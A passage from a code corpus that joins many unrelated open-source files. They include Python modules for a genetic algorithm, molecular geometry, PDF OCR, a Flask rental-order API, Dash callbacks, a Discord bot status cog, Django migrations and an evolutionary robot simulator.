survivors = sorted_population[:midpoint]
num_children = sorted_population.shape[0] - survivors.shape[0]
children = create_children(survivors, num_children)
new_population = np.concatenate([survivors, children])
return new_population
def create_children(survivors, num_children):
n_survivors = survivors.shape[0]
parents = [(randint(0, n_survivors - 1), randint(0, n_survivors - 1)) for _ in range(num_children)]
children = [mate(survivors, par) for par in parents]
return np.array(children)
def mate(survivors, parents):
p_1 = survivors[parents[0]]
p_2 = survivors[parents[1]]
child = mate_chromosome(p_1, p_2)
return child
| 2,320 |
automechanic_old/ipyx2z/geom.py
|
avcopan/automechanic-history-save
| 0 |
2024250
|
""" Geometry-based interface to pyx2z
"""
import numpy
import pyx2z
def graph(mgeo, res=0):
""" molecule graph of a cartesian geometry
"""
mgrphs = resonance_graphs(mgeo)
return mgrphs[res]
def number_of_resonance_graphs(mgeo):
""" number of resonances
"""
return len(resonance_graphs(mgeo))
def resonance_graphs(mgeo):
""" molecule graphs of a cartesian geometry, by resonance
"""
x2zms = _pyx2z_molec_struct(mgeo)
natms = x2zms.size()
nrncs = x2zms.resonance_count()
atms, _ = zip(*mgeo)
mgrphs = []
for ridx in range(nrncs):
bnds = frozenset()
for i in range(natms):
for j in range(i):
order = x2zms.bond_order(i, j, ridx)
if order > 0:
bnd = frozenset([i, j])
bnds |= frozenset([(bnd, order)])
mgrphs.append((atms, bnds))
return tuple(mgrphs)
def radical_sites(mgeo):
""" radical sites of a molecule
"""
x2zms = _pyx2z_molec_struct(mgeo)
natms = x2zms.size()
idxs = tuple(i for i in range(natms) if x2zms.is_radical(i))
return idxs
def _pyx2z_molec_struct(mgeo):
x2zps = _pyx2z_prim_struct(mgeo)
return pyx2z.MolecStruct(x2zps)
def _pyx2z_prim_struct(mgeo):
x2zmg = _pyx2z_molec_geom(mgeo)
return pyx2z.PrimStruct(x2zmg)
def _pyx2z_molec_geom(mgeo):
x2zmg = pyx2z.MolecGeom()
for asymb, xyz in mgeo:
x2zatm = _pyx2z_atom(asymb, xyz)
x2zmg.push_back(x2zatm)
return x2zmg
def _pyx2z_atom(asymb, xyz):
ang2bohr = 1.8897259886
x2zatm = pyx2z.Atom(asymb)
x2zatm[0], x2zatm[1], x2zatm[2] = numpy.multiply(xyz, ang2bohr)
return x2zatm
| 1,705 |
froide/document/pdf_utils.py
|
kratz00/froide
| 0 |
2024416
|
import contextlib
from PyPDF2 import PdfFileReader
from PIL import Image as PILImage
import wand
from wand.image import Image
try:
import tesserocr
except ImportError:
tesserocr = None
try:
import pdflib
except ImportError:
pdflib = None
TESSERACT_LANGUAGE = {
'en': 'eng',
'de': 'deu'
}
class PDFProcessor(object):
def __init__(self, filename, language=None, config=None):
self.filename = filename
self.pdf_reader = PdfFileReader(filename)
self.num_pages = self.pdf_reader.getNumPages()
self.language = language
self.config = config or {}
def get_meta(self):
doc_info = self.pdf_reader.getDocumentInfo()
return {
'title': doc_info.title
}
def get_images(self, pages=None, resolution=300):
if pages is None:
pages = range(self.num_pages)
for page_no in pages:
with self.get_image(page_no, resolution=resolution) as img:
yield img
@contextlib.contextmanager
def get_image(self, page_no, resolution=300):
filename = "{}[{}]".format(self.filename, page_no)
with Image(
filename=filename,
resolution=resolution,
background=wand.color.Color('#fff')) as img:
img.alpha_channel = False
yield img
def get_text(self, pages=None):
if pages is None:
pages = range(self.num_pages)
pdflib_pages = None
if pdflib is not None:
pdflib_doc = pdflib.Document(self.filename)
pdflib_pages = list(pdflib_doc)
for page_no in pages:
if pdflib_pages is not None:
page = pdflib_pages[page_no]
text = ' '.join(page.lines).strip()
else:
page = self.pdf_reader.getPage(page_no)
text = page.extractText()
if not text.strip():
text = self.ocr_page(page_no)
yield text.strip()
def ocr_page(self, page_no):
if tesserocr is None:
return ''
with self.get_image(page_no, resolution=300) as img:
pil_image = PILImage.frombytes('RGB', img.size, img.make_blob('RGB'))
return tesserocr.image_to_text(
pil_image,
lang=TESSERACT_LANGUAGE[self.language],
path=self.config.get('TESSERACT_DATA_PATH', '')
)
def run_ocr(self, timeout=180):
from froide.helper.document import run_ocr
output_bytes = run_ocr(
self.filename,
language=TESSERACT_LANGUAGE[self.language],
timeout=timeout
)
return output_bytes
def save_pages(self, path, **kwargs):
for page, img in enumerate(self.get_images(**kwargs), 1):
filename = path.format(page=page)
img.save(filename=filename)
yield filename
def crop_image(image_path, left, top, width, height):
with Image(filename=image_path) as img:
img.alpha_channel = False
img.crop(left, top, left + width, top + height)
return img.make_blob('gif')
| 3,171 |
aoc/utils/parsers.py
|
rmenai/advent-of-code
| 0 |
2023345
|
from typing import Any, Callable, Optional, Union
from aocd import get_data as _get_data
from aoc.core import settings
def get_data(year: int, day: int, func: Optional[Callable[[str], Any]] = None,
split: Optional[Union[bool, str]] = False) -> Any:
"""Get and clean the data for a specific Advent of Code day.
Args:
year (int): The event year.
day (int): The challenge day.
func (Callable): A function to call for each line (or the entire
input if not splitting). Default is None.
split (bool, optional): The character(s) to split the input by,
or True to split by newlines. Defaults to False.
"""
raw_data = _get_data(year=year, day=day, session=settings.aoc_session) # Get the raw data as a string.
data = raw_data
if split is not False:
if isinstance(split, str):
data = raw_data.split(split)
else:
data = raw_data.splitlines() # Split by newlines if needed.
if func:
data = list(map(func, data)) # Map each line to the given type.
elif func:
data = func(raw_data) # Not splitting by lines, map to given type,
return data
| 1,206 |
ihome/modules/api/order.py
|
sexlovelove/info
| 1 |
2024366
|
import datetime
from ihome import db, sr
from ihome.models import House, Order, User
from ihome.utils.common import login_required
from ihome.utils.response_code import RET
from . import api_blu
from flask import request, g, jsonify, current_app
# 预订房间
@api_blu.route('/orders', methods=['POST'])
@login_required
def add_order():
"""
下单
1. 获取参数
2. 校验参数
3. 查询指定房屋是否存在
4. 判断当前房屋的房主是否是登录用户
5. 查询当前预订时间是否存在冲突
6. 生成订单模型,进行下单
7. 返回下单结果
:return:
"""
# 1. 获取参数
user_id = g.user_id
house_id = request.json.get("house_id")
start_date = request.json.get("start_date")
end_date = request.json.get("end_date")
# 2. 校验参数
if not all([house_id, start_date, end_date]):
return jsonify(errno=RET.PARAMERR, errmsg="参数不足")
if not user_id:
return jsonify(errno=RET.SESSIONERR, errmsg="用户未登录")
# 字符串格式的时间转换为日期格式的时间
try:
start_date = datetime.datetime.strptime(start_date, "%Y-%m-%d")
end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d")
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.PARAMERR, errmsg="格式错误")
if start_date <= end_date:
return jsonify(errno=RET.PARAMERR, errmsg="格式错误")
# 预定天数
days = end_date - start_date
# 3. 查询指定房屋是否存在
try:
house = House.query.get(house_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="数据库查询错误")
if not house:
return jsonify(errno=RET.NODATA, errmsg="无房屋可预定")
# 4. 判断当前房屋的房主是否是登录用户
try:
house_user = House.query.filter(House.user_id == user_id).first()
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="数据库查询错误")
if house_user:
return jsonify(errno=RET.PARAMERR, errmsg="房主是登录用户")
# 5. 查询当前预订时间是否存在冲突
# 查询当前房屋的所有订单
house_orders = house.orders
# i用来记录订单冲突数量
i = 0
# 对所有订单进行遍历,如果中途出现有时间冲突的,其实就可以退出了,如果一直没有碰到有时间冲突的,那么就要遍历到最后一个,确保所有的订单都没有时间冲突
for house_order in house_orders:
# 如果发生时间冲突(别人的开始时间或者结束时间在我的预定开始时间内,都是不符合的)
if (start_date <= house_order.begin_date < end_date) or (start_date < house_order.end_date < end_date):
i += 1
break
if i > 0:
return jsonify(errno=RET.PARAMERR, errmsg="无法预定")
# 6. 生成订单模型,进行下单
order = Order()
order.user_id = user_id
order.house_id = house_id
order.begin_date = start_date
order.end_date = end_date
order.days = days
order.house_price = house.price
order.amount = days * house.price
order.status = "WAIT_ACCEPT"
try:
db.session.add(order)
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据库异常")
# 7. 返回下单结果
data = order.id
return jsonify(errno=RET.OK, errmsg="成功", data=data)
# 获取我的订单
@api_blu.route('/orders')
@login_required
def get_orders():
"""
1. 去订单的表中查询当前登录用户下的订单
2. 返回数据
:return:
"""
# 判断用户是否登录
user_id = g.user_id
if not user_id:
return jsonify(errno=RET.SESSIONERR, errmsg="用户尚未登录")
# 根据用户id获取用户对象
try:
user = User.query.get(user_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="数据库查询错误")
# 判断user是否存在
if not user:
return jsonify(errno=RET.NODATA, errmsg="用户不存在")
# 判断当前是什么角色发送请求
role = request.args.get("role")
if not role:
return jsonify(errno=RET.PARAMERR, errmsg="参数不足")
if role not in (["custom", "landlord"]):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
# 房客角色发送查看订单请求
if role == "custom":
order_dict_list = []
order_list = []
order_list = user.orders
for order in order_list if order_list else []:
order_dict_list.append(order.to_dict())
data = {
"orders": order_dict_list
}
return jsonify(errno=RET.OK, errmsg="ok", data=data)
# 房东角色发送请求
else:
# 用户发布的房子的id列表
houses_id_list = [house.id for house in user.houses]
# 属于该房东的订单
landlord_order_list = Order.query.filter(Order.house_id.in_(houses_id_list)).order_by(Order.create_time).all()
# 转化为字典列表
landlord_order_dict_list = []
for landlord_order in landlord_order_list if landlord_order_list else []:
landlord_order_dict_list.append(landlord_order.to_dict())
data = {
"orders": landlord_order_dict_list
}
return jsonify(errno=RET.OK, errmsg="ok", data=data)
# 接受/拒绝订单
@api_blu.route('/orders', methods=["PUT"])
@login_required
def change_order_status():
"""
1. 接受参数:order_id
2. 通过order_id找到指定的订单,(条件:status="待接单")
3. 修改订单状态
4. 保存到数据库
5. 返回
:return:
"""
# 1.接受参数:order_id
user_id = g.user_id
action = request.json.get("action")
order_id = request.json.get("order_id")
if not user_id:
return jsonify(errno=RET.NODATA, errmsg="请登录")
if not all([order_id, action]):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
if action not in ("accept", "reject"):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
# 2.通过order_id找到指定的订单
order = None
try:
order = Order.query.filter(Order.id == order_id, Order.status == "WAIT_ACCEPT").first()
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="未查询到数据")
# 3. 修改订单状态
if action == "accept":
order.status = "WAIT_PAYMENT"
else:
reason = request.json.get("reason")
if not reason:
return jsonify(errno=RET.NODATA, errmsg="原因为空")
order.comment = reason
order.status = "REJECTED"
# 4.保存到数据库
try:
db.session.commit()
except Exception as e:
db.session.rollback()
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="数据保存失败")
# 5.返回
return jsonify(errno=RET.OK, errmsg="OK")
# 评论订单
@api_blu.route('/orders/comment', methods=["PUT"])
@login_required
def order_comment(order_id):
"""
订单评价
1. 获取参数
2. 校验参数
3. 修改模型
:return:
"""
# 1.获取参数(user_id:当前登录的用户对象 comment: 评论对象)
param_dict = request.json
comment = param_dict.get("comment")
order_id = param_dict.get("order_id")
user_id = g.user_id
# 2.校验参数
# 非空判断
if not comment:
return jsonify(errno=RET.PARAMERR, errmsg="请输入评论内容")
# 通过订单id查询出订单模型
# 确保用户只能评价自己的订单并且订单处于待评价状态
try:
order = Order.query.filter(Order.id == order_id, Order.status == "WAIT_COMMENT").first()
house = order.house
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="查询订单数据错误")
# 判断该订单是否存在
if not all([order, house]):
return jsonify(errno=RET.NODATA, errmsg="不存在该订单")
# 3.修改模型
# 将订单状态设置为完成
order.status = "COMPLETE"
# 保存订单的评价信息
order.comment = comment
# 将房屋的订单完成数量加1
house.order_count += 1
# 保存数据
try:
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
# 删除该房屋的redis缓存
try:
sr.delete("house_info_%s" % house.id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.OK, errmsg="OK", data=comment)
| 7,574 |
callbacks/watch.py
|
xinetzone/self-driving-dash
| 0 |
2023183
|
import pandas as pd
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from dash import callback_context
from utils.client import plot_frame, Canvas
from tools.frame import Shape
from app import app
from layouts.watch import stream
@app.callback(
Output('frame-slider', 'value'),
Output('frame-start', 'value'),
Output('frame-end', 'value'),
Input('frame-slider', 'value'),
Input('frame-start', 'value'),
Input('frame-end', 'value'))
def callback(slider_value, frame_start, frame_end):
ctx = callback_context
trigger = ctx.triggered[0]
value = trigger['value']
if not value:
raise PreventUpdate
else:
trigger_id = trigger["prop_id"].split(".")[0]
if trigger_id == 'frame-slider':
slider_value = value
elif trigger_id == 'frame-start':
slider_value[0] = value
elif trigger_id == 'frame-end':
slider_value[1] = value
frame_start = min(slider_value)
frame_end = max(slider_value)
slider_value = frame_start, frame_end
return slider_value, frame_start, frame_end
@app.callback(Output('watch-view-graph', 'figure'),
Input('frame-end', 'value'))
def replay_view_graph_frame(frame_end):
'''更新鸟瞰图'''
if len(stream)==0:
raise PreventUpdate
frame = stream[frame_end]
canvas = Canvas()
shapes = [Shape(**shape) for shape in frame.to_dict('records')]
shapes = [canvas.to_shape(*shape.view) for shape in shapes]
canvas.view.update_layout(shapes=shapes)
canvas.update_base()
return canvas.view
@app.callback(Output('watch-memory-output', 'data'),
Input('frame-start', 'value'),
Input('frame-end', 'value'),
Input('watch-memory-class', 'value'))
def store_frame(frame_start, frame_end, class_selected):
if frame_start == frame_end or len(stream)==0:
raise PreventUpdate
df = stream[frame_start:frame_end+1]
filtered = df[df['class_name'] == class_selected]
return filtered.to_dict('records')
@app.callback(Output('watch-feature-graph', 'figure'),
Input('watch-memory-output', 'data'))
def on_data_set_graph(data):
if data is None or len(stream)==0:
raise PreventUpdate
filtered = pd.DataFrame.from_records(data)
fig = plot_frame(filtered)
return fig
| 2,396 |
main.py
|
Sbenaventebravo/EjemploSwapi
| 0 |
2023608
|
from src.conexion import obtener_personajes, obtener_naves
from src.manupulacion import cantidad_de_personajes
from src.render import imprimir_catidad_de_personajes
if __name__ == "__main__":
personajes = obtener_naves()
cantidad = cantidad_de_personajes(personajes)
imprimir_catidad_de_personajes(cantidad)
| 320 |
lessons/2/tictactoe.py
|
joshuahaertel/tictactoe
| 0 |
2023514
|
from .grid import Grid
class TicTacToe:
def __init__(self):
self.grid = Grid()
def play(self):
print('play!')
if __name__ == '__main__':
TicTacToe().play()
| 189 |
code/199.Binary-Tree-Right-Side-View.py
|
Aden-Q/leetcode
| 1 |
2024166
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from collections import deque
class Solution:
def rightSideView(self, root: Optional[TreeNode]) -> List[int]:
res = []
if not root:
return res
q = deque([root])
while q:
node = q[-1] # take the last node on the current level
res.append(node.val)
size = len(q)
for _ in range(size):
node = q.popleft()
if node.left: q.append(node.left)
if node.right: q.append(node.right)
return res
| 755 |
queuebot/cogs/playing_status.py
|
ThaTiemsz/queuebot
| 11 |
2024007
|
import random
import discord
from discord.ext import tasks
from queuebot.cog import Cog
STATUSES = [
(discord.ActivityType.watching, '#submissions'),
(discord.ActivityType.watching, 'blobs as they come in'),
(discord.ActivityType.playing, 'with blobs'),
(discord.ActivityType.listening, 'blob radio')
]
class PlayingStatus(Cog):
def __init__(self, bot):
super().__init__(bot)
self.activity_changer.start()
def cog_unload(self):
self.activity_changer.cancel()
def generate_activity(self):
"""Generate a random :class:`discord.Activity`."""
activity_type, format_string = random.choice(STATUSES)
return discord.Activity(type=activity_type, name=format_string)
@tasks.loop(hours=1)
async def activity_changer(self):
"""Change the bot's presence to a random activity."""
activity = self.generate_activity()
await self.bot.change_presence(activity=activity)
@activity_changer.before_loop
async def before_activity(self):
await self.bot.wait_until_ready()
def setup(bot):
bot.add_cog(PlayingStatus(bot))
| 1,140 |
clispy/callcc.py
|
takahish/lispy
| 4 |
2024615
|
# Copyright 2019 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from clispy.type import Cons, Null
class CallCC(object):
def __init__(self, proc):
from clispy.python import PyObject
self.ball = RuntimeWarning("Sorry, can't continue this continuation any longer.")
self.ball.retval = Null()
self.proc = proc
self.args = Cons(PyObject(Invoke(self)), Null())
def __call__(self, var_env, func_env, macro_env):
try:
return self.proc(self.args, var_env, func_env, macro_env)
except RuntimeWarning as w:
if w is self.ball:
return self.ball.retval
else:
raise w
class Invoke(object):
def __init__(self, callcc):
self.callcc = callcc
def __call__(self, retval):
self.callcc.ball.retval = retval
raise self.callcc.ball
| 1,489 |
proposalsite/search/templatetags/custom_tags.py
|
pyconjp/proposal.search.2020
| 0 |
2024299
|
from django import template
register = template.Library()
@register.simple_tag
def add_query_to_request(request, field, value):
url_dict = request.GET.copy()
url_dict[field] = value
return url_dict.urlencode()
@register.filter(is_safe=True)
def parse_search_parameter(query_dict, key):
value = query_dict.get(key)
return value if value else ""
| 369 |
src/evaluate.py
|
nidolow/image-classification
| 1 |
2022897
|
import os
import json
import numpy as np
from optparse import OptionParser
from models import generate_model
from train import get_train_data_frames, generate_data_flow
def evaluate(model_path, data_path):
"""
Evaluates given model with test set separated from all training data.
Gives details about accuracy for every class. Outputs results od screen.
Args:
model_path (str): path to model file
data_path (str): training data directory
"""
with open(os.path.splitext(model_path)[0] + '.conf') as json_read:
config = json.load(json_read)
_, _, test_df = get_train_data_frames(data_path)
test_data = generate_data_flow(test_df, config, data_path, shuffle=False)
model = generate_model(config)
model.load_weights(model_path)
predictions = model.predict(test_data, steps=np.ceil(len(test_df) / config['batch']))
predictions = np.array(np.argmax(predictions, axis=-1))
test_df['labels'] = test_df['category'].replace(test_data.class_indices)
labels = np.array(test_df['labels'])
labels_len = len(np.array(test_df['labels']))
print('\nModel:', model_path)
print('Total accuracy:', sum(predictions == labels) / labels_len)
for k in test_data.class_indices:
v = test_data.class_indices[k]
print(k, 'accuracy')
print(sum((predictions == labels) & (labels == v)) / sum((labels == v)))
print('')
def main():
parser = OptionParser()
parser.add_option('-m', '--model_path', dest='model_path', help='model to load')
parser.add_option('-d', '--models_dir', dest='models_dir', help='path to directory with models')
parser.add_option('--data_path', dest='data_path', default='data/train/',
help='path to training files directory')
(options, args) = parser.parse_args()
if not options.model_path and not options.models_dir:
parser.error('Requires option -m or -d.')
if options.model_path:
evaluate(options.model_path, options.data_path)
if options.models_dir:
for file_path in os.listdir(options.models_dir):
root, ext = os.path.splitext(file_path)
if ext == '.index' and os.path.splitext(root)[-1] == '.mdl':
evaluate(os.path.join(options.models_dir, root), options.data_path)
if __name__ == '__main__':
main()
| 2,376 |
Django/dojo_ninjas/apps/first_app/migrations/0001_initial.py
|
justnclrk/Python
| 0 |
2024001
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-02-22 06:22
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Dojo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('city', models.CharField(max_length=255)),
('state', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Ninja',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('state', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.AddField(
model_name='dojo',
name='student',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='Dojos', to='first_app.Ninja'),
),
]
| 1,625 |
Chapter08/ch8/exceptions/multiple.except.py
|
puelloc/Learn-Python-Programming-Second-Edition
| 55 |
2024049
|
# This is not a valid Python module - Don't run it.
try:
# some code
except Exception1:
# react to Exception1
except (Exception2, Exception3):
# react to Exception2 or Exception3
except Exception4:
# react to Exception4
...
| 241 |
hypergan/losses/category_loss.py
|
jimimased/HyperGAN
| 0 |
2022761
|
def config():
selector = hc.Selector()
selector.set('discriminator', None)
selector.set('create', create)
return selector.random_config()
def create(config, gan):
category_layer = linear(d_last_layer, sum(config['categories']), 'v_categories',stddev=0.15)
category_layer = batch_norm(config['batch_size'], name='v_cat_loss')(category_layer)
category_layer = config['generator.activation'](category_layer)
categories_l = categories_loss(categories, category_layer, config['batch_size'])
g_losses.append(-1*config['categories_lambda']*categories_l)
d_losses.append(-1*config['categories_lambda']*categories_l)
def split_categories(layer, batch_size, categories):
start = 0
ret = []
for category in categories:
count = int(category.get_shape()[1])
ret.append(tf.slice(layer, [0, start], [batch_size, count]))
start += count
return ret
def categories_loss(categories, layer, batch_size):
loss = 0
def split(layer):
start = 0
ret = []
for category in categories:
count = int(category.get_shape()[1])
ret.append(tf.slice(layer, [0, start], [batch_size, count]))
start += count
return ret
for category,layer_s in zip(categories, split(layer)):
size = int(category.get_shape()[1])
category_prior = tf.ones([batch_size, size])*np.float32(1./size)
logli_prior = tf.reduce_sum(tf.log(category_prior + TINY) * category, axis=1)
layer_softmax = tf.nn.softmax(layer_s)
logli = tf.reduce_sum(tf.log(layer_softmax+TINY)*category, axis=1)
disc_ent = tf.reduce_mean(-logli_prior)
disc_cross_ent = tf.reduce_mean(-logli)
loss += disc_ent - disc_cross_ent
return loss
| 1,786 |
train_evolution_algorithm.py
|
gpatsiaouras/Robot-Simulator
| 0 |
2023855
|
import os
import numpy as np
import rooms
import time
from evolution import Simulator
from evolution import EvolutionaryAlgorithmPlotter
from scipy.spatial import distance
# Fitness Formula Parameters
COLLISION_PENALTY = -0.5
COLLISION_WEIGHT = 0.3
GROUND_MULTIPLIER = 100
GROUND_WEIGHT = 0.7
# Evolutionary Algorithm
NUMBER_OF_PARENTS_MATING = 4
ROOM_TO_USE = rooms.room_3
np.set_printoptions(precision=2)
def calculate_distance(list_vectors):
tot_distance = 0 # just adding all together
count_i = 0
for i in list_vectors:
count_i += 1
count_j = 0
for j in list_vectors:
count_j += 1
if count_i == count_j: # sole purpose of this counts is not calculate norms with same vector (probably irrelevant..)
pass
else:
dist1 = distance.euclidean(i, j) # scipy library
tot_distance += dist1
tot_distance = tot_distance / (len(list_vectors) ** 2)
return tot_distance
def run_chromosome_on_simulator(weights1, weights2, steps=-1):
# Demonstrate on the simulator
sim = Simulator(ROOM_TO_USE, max_steps=steps, autonomous=True, pygame_enabled=True)
sim.network.weights1 = weights1
sim.network.weights2 = weights2
sim.run()
class EvolutionaryAlgorithm:
def __init__(self, number_of_generations, robots_per_generation, exploration_steps, save_each=None):
# Input Parameters
self.number_of_generations = number_of_generations
self.robots_per_generation = robots_per_generation
self.exploration_steps = exploration_steps
self.save_each = save_each
# Fixed Parameters of the ANN
self.number_of_nodes_input_layer = 17
self.number_of_nodes_hidden_layer = 5
self.number_of_nodes_output_layer = 2
# Statistical data
self.fitness_average = []
self.fitness_maximum = []
self.diversity = []
# Calculating the number of genes based on the layers of the RNN used to calculate the motion
self.number_of_genes = self.number_of_nodes_input_layer * self.number_of_nodes_hidden_layer \
+ self.number_of_nodes_hidden_layer * self.number_of_nodes_output_layer
# Specify population size
self.population_size = (self.robots_per_generation, self.number_of_genes)
def weights_to_vector(self, weights1, weights2):
return np.append(weights1.flatten(), weights2.flatten())
def vector_to_weights(self, vector):
weights_combined = np.split(vector, [
self.number_of_genes - self.number_of_nodes_hidden_layer * self.number_of_nodes_output_layer,
self.number_of_genes])
return weights_combined[0].reshape(self.number_of_nodes_input_layer, self.number_of_nodes_hidden_layer), \
weights_combined[1].reshape(self.number_of_nodes_hidden_layer, self.number_of_nodes_output_layer)
def fitness(self, simulator):
ground_coverage = simulator.env.ground_coverage
collisions = simulator.robot.collisions
fitness = (GROUND_WEIGHT * ground_coverage * GROUND_MULTIPLIER
+ COLLISION_WEIGHT * collisions * COLLISION_PENALTY) / (GROUND_WEIGHT + COLLISION_WEIGHT)
return fitness
def select_mating_pool(self, population, fitness, number_of_parents_mating):
parents = np.empty((number_of_parents_mating, population.shape[1]))
for parent_number in range(number_of_parents_mating):
index_of_max_fitness = np.where(fitness == np.max(fitness))
index_of_max_fitness = index_of_max_fitness[0][0]
parents[parent_number, :] = population[index_of_max_fitness, :]
fitness[index_of_max_fitness] = -99999999999
return parents
def crossover(self, parents, offspring_shape):
offspring = np.empty(offspring_shape)
# We specify the crossover point to be at the center
crossover_point = np.uint8(offspring_shape[1] / 2)
for i in range(offspring_shape[0]):
# Index of the first parent
parent1_index = i % parents.shape[0]
# Index of the second parent
parent2_index = (i + 1) % parents.shape[0]
# First half from parent 1
offspring[i, 0:crossover_point] = parents[parent1_index, 0:crossover_point]
# Second half from parent 2
offspring[i, crossover_point:] = parents[parent2_index, crossover_point:]
return offspring
def mutation(self, crossover):
# Mutation changes a single gene in each offspring randomly.
for index in range(crossover.shape[0]):
# Generate a random value to add to the gene
random_value = np.random.uniform(-5.0, 5.0, 1)
crossover[index, 4] = crossover[index, 4] + random_value
return crossover
def evolve(self, start_population=None, start_gen=0):
if start_population is None:
population = np.random.uniform(low=-5.0, high=5.0, size=self.population_size)
else:
population = start_population
simulator = Simulator(ROOM_TO_USE, self.exploration_steps, autonomous=True, pygame_enabled=False)
for generation in range(start_gen, self.number_of_generations):
start = time.time()
print("\nGeneration {0}#".format(generation))
print("Robot running: ", end="", flush=True)
fitness = []
for i in range(self.robots_per_generation):
simulator.reset()
simulator.network.weights1, simulator.network.weights2 = self.vector_to_weights(population[i])
print(i, end=" ", flush=True)
simulator.run()
fitness.append(self.fitness(simulator))
self.diversity.append(calculate_distance(population))
self.fitness_average.append(np.average(fitness))
self.fitness_maximum.append(np.max(fitness))
print("\nFitness: " + str(fitness))
print("Max Fitness: {0:.2f}".format(np.max(fitness)))
# Select the best parents in the population
parents = self.select_mating_pool(population, fitness, NUMBER_OF_PARENTS_MATING)
# Generate the next generation using crossover
offspring_shape = (self.population_size[0] - parents.shape[0], self.number_of_genes)
crossover = self.crossover(parents, offspring_shape)
# Add some variations to the crossover using mutation
mutation = self.mutation(crossover)
population[0:parents.shape[0], :] = parents
population[parents.shape[0]:, :] = mutation
# Save checkpoint according to frequency requested
if generation % self.save_each == 0:
self.save_checkpoint(generation, population)
print("Time elapsed: {0}".format(time.time() - start))
# If this is the last generation
if generation == self.number_of_generations - 1:
best_chromosome_index = np.where(fitness == np.max(fitness))
# Retrieve the weights from the chromosome
weights1, weights2 = self.vector_to_weights(population[best_chromosome_index].T)
# Print the best weights
print("\nBest Weights:")
print(weights1)
print(weights2)
return weights1, weights2
def save_checkpoint(self, generation, population):
if not os.path.exists(os.path.join("ckpt")):
os.makedirs("ckpt")
ckpt = open("ckpt/gen_{}.txt".format(generation), "w+")
population.tofile(ckpt)
def evolve_checkpoint(self, ckpt_dir):
curr_path = os.path.dirname(os.path.abspath(__file__))
ckpt_dir = curr_path + ckpt_dir
ckpt = open(ckpt_dir, "r")
population = np.fromfile(ckpt, dtype=np.float64)
start_gen = int(ckpt_dir.split("_").pop()[:-4])
return self.evolve(population.reshape(self.robots_per_generation, self.number_of_genes), start_gen)
if __name__ == '__main__':
# Initiate the evolutionary algorithm with parameters
evolutionary_algorithm = EvolutionaryAlgorithm(
number_of_generations=30,
robots_per_generation=10,
exploration_steps=2000,
save_each=2
)
weights1, weights2 = evolutionary_algorithm.evolve()
# weights1, weights2 = evolutionary_algorithm.evolve_checkpoint("/ckpt/gen_70.txt")
# Plot Data
plotter = EvolutionaryAlgorithmPlotter(evolutionary_algorithm)
plotter.plot()
# Demonstrate on the simulator by replicating the best individual weights
run_chromosome_on_simulator(weights1, weights2)
| 8,780 |
include/test/test_config.py
|
neurodata-arxiv/blci
| 0 |
2023152
|
#!/usr/bin/env python
# Copyright 2016 neurodata (http://neurodata.io/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# test_dependencies.py
# Created by <NAME> on 2016-11-28.
# Email: <EMAIL>
import argparse
import sys
import os
sys.path.append(os.path.abspath("../"))
from config import *
def test_valid():
fn = "test-blci/blci.yml"
c = config(fn, projecthome="test-blci")
assert c.isvalid(), "Invalid configuration file '{}'".format(fn)
def test_invalid():
fn = "config/error.yml"
c = config(fn, projecthome="test-blci")
assert not c.isvalid(), "Invalid configuration file '{}'".format(fn)
def test_unique():
fn = "config/error.yml"
c = config(fn, projecthome="config")
sp = os.path.splitext(fn)
assert sp[0] + "_1" + sp[1] == c.unique_fn(fn)
def test_data_dep_stub():
fn = "test-blci/incomplete_blci.yml"
c = config(fn, projecthome="test-blci")
assert(not(c == config("config/test_incomplete.yml", projecthome="config")))
| 1,488 |
clovek_ne_jezi_se/log_handler.py
|
munichpavel/clovek-ne-jezi-se
| 0 |
2024428
|
import sys
import logging
